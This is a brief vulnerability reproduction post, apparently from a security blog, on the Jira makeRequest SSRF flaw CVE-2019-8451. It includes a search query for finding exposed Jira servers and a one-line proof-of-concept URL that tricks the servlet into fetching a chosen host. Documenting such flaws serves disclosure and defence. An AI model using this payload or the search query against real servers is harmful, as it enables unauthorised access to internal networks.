Atlassian Jira Makerequest Ssrf Vulnerability Cve 2019 8451
Atlassian Jira Makerequest Ssrf Vulnerability Cve 2019 8451
Atlassian Jira makeRequest SSRF vulnerability CVE-2019-8451
Vulnerability Description
Jira’s /plugins/servlet/gadgets/makeRequest resource has an SSRF vulnerability because of the logical flaw of JiraWhitelist. Remote attackers who successfully exploit this vulnerability can access intranet resources as Jira server.
Vulnerability Impact
Atlassian Jira <8.4.0
Network surveying and mapping
app=”ATLASSIAN-JIRA”
Vulnerability reappears
Login page
Verify POC
1
/plugins/servlet/gadgets/makeRequest?url=https://目标IP@www.baidu.com/robots.txt
This post is licensed under CC BY 4.0 by the author.